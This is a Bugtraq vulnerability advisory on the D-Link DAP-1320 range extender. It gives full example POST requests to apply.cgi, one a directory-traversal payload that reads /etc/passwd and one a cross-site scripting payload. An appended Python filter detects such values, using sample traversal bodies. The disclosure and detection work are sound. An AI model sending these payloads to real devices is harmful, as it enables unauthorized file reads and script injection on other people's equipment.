D-Link DAP-1320 Wireless Range Extender Directory Traversal and

Board: Bugtraq | Time: 11 years ago (2014/04/18 02:01)
D-Link's DAP-1320 Wireless Range Extender suffers from both a directory traversal and an XSS vulnerability on all firmware versions (current v. 1.20B07).

----------------------------------------------------------------------

Directory Traversal
CWE-22: Path Traversal

The POST param 'html_response_page' of apply.cgi suffers from a directory traversal vulnerability.

The following example will display the contents of /etc/passwd:

http://<IP>/apply.cgi
Pragma: no-cache
Cache-control: no-cache
Content-Type: application/x-www-form-urlencoded

POST html_response_page=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F...%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&login_name=&html_response_message=just_login&log_pass=&login_n=admin&action=do_graph_auth&tmp_log_pass=PAN&tmp_log_pass_auth=FRIED&graph_code=0DEY&session_id=57687&gcode_base64=8TEHPOO%3D HTTP/1.1

----------------------------------------------------------------------

XSS
CWE-79: Cross Site Scripting

The POST param 'html_response_page' of apply.cgi suffers from an XSS vulnerability.

Example:

http://<IP>/apply.cgi
Pragma: no-cache
Cache-control: no-cache
Content-Type: application/x-www-form-urlencoded

POST html_response_page=%3Cscript%3Ealert%28"SquirrelLord"%29%3B%3C%2Fscript%3E&login_name=Huggy&html_response_message=just_login&log_pass=&login_n=admin&action=do_graph_auth&tmp_log_pass=pop&tmp_log_pass_auth=goes&graph_code=joffrey&session_id=57687&gcode_base64=ZZTOPI%3D HTTP/1.1

----------------------------------------------------------------------

Vendor Link: http://support.dlink.com/ProductInfo.aspx?m=DAP-1320

Research Contact: K Lovett
Article code (AID): #1JK1RV4_ (Bugtraq)
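Both issues above come from the same unvalidated 'html_response_page' field, so one check on that field covers them. The following is an added example, not part of the original advisory or of D-Link's code: a filter for a proxy or log pipeline that decodes the form body and reports traversal segments, markup characters, and values outside an allowlist. The function names, the allowlist pattern and the page name "login.asp" are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote

# Assumption: legitimate values are bare page names such as "login.asp";
# the advisory does not list the firmware's real pages.
SAFE_PAGE = re.compile(r"[A-Za-z0-9_-]{1,64}\.(?:html?|asp)")

def fully_decode(value, max_rounds=5):
    """Percent-decode until stable so double-encoded input is seen in clear."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_body(body):
    """Return a sorted list of findings for html_response_page in a form body."""
    findings = set()
    # parse_qs performs the first round of percent-decoding.
    for raw in parse_qs(body, keep_blank_values=True).get("html_response_page", []):
        page = fully_decode(raw)
        if ".." in re.split(r"[\\/]", page):
            findings.add("path-traversal")      # CWE-22
        if re.search(r"[<>\"']", page):
            findings.add("html-markup")         # CWE-79
        if not SAFE_PAGE.fullmatch(page):
            findings.add("not-allowlisted")
    return sorted(findings)

# Constructed request bodies, shortened from the shapes shown in the advisory.
SAMPLES = {
    "traversal": "html_response_page=%2F..%2F..%2Fetc%2Fpasswd&login_n=admin",
    "double-encoded": "html_response_page=%252F..%252F..%252Fetc%252Fpasswd",
    "markup": "html_response_page=%3Cb%3Ex%3C%2Fb%3E&login_n=admin",
    "benign": "html_response_page=login.asp&login_n=admin",
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(f"{name:15} {inspect_body(body)}")
```

The allowlist is the control that matters; the traversal and markup findings only label why a rejected value is suspicious.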